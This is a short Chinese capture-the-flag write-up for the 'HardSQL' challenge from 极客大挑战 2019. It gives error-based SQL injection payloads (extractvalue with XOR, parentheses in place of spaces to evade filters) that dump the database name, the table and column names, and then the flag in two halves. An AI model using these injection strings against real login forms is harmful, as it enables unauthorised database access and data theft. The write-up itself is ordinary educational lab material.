[极客大挑战 2019]HardSQL1

拿到题目,好多类似的,这次估计更难,sql注入漏洞

随便注入一个

估计是被过滤了

2.1我们先去爆数据库:先构造payload:

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(database()))))%23

爆表名

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))%23

爆列名

复制代码
?username=admin&password=admin'^extractvalue(1,concat(0x5c,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))%23

flag出来了,但是只有一半,使用right和left

复制代码
/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

得到flag

相关推荐
FIN66683 小时前
新天力:食品容器安全与创新的领航者
科技·安全·产品运营·创业创新·制造
alex1003 小时前
BeaverTails数据集:大模型安全对齐的关键资源与实战应用
人工智能·算法·安全
鹿鸣天涯3 小时前
Kali Linux 2025.3 正式发布:更贴近前沿的安全平台
linux·运维·安全
!chen3 小时前
Harbor磁盘空间清理指南:如何安全清理半年前的镜像
安全
alex1003 小时前
Context Compliance Attack:大模型安全的新兴威胁与防御策略
网络·安全·web安全
xiejava10186 小时前
开源安全管理平台wazuh-安装与配置
安全·开源
粟悟饭&龟波功8 小时前
【网络安全】三、入门篇:Web安全常见漏洞概述
安全·web安全
FIN66688 小时前
新天力科技IPO进行时:技术引领未来,创新驱动发展
科技·安全·搜索引擎·产品运营·创业创新·制造
pingao1413789 小时前
道路交通气象站:筑牢交通出行安全防线的智能监测卫士
安全
通信瓦工10 小时前
IEC 62368-1-2023音视频、信息技术和通信技术设备安全标准标准介绍
安全·信息技术·标准下载·标准翻译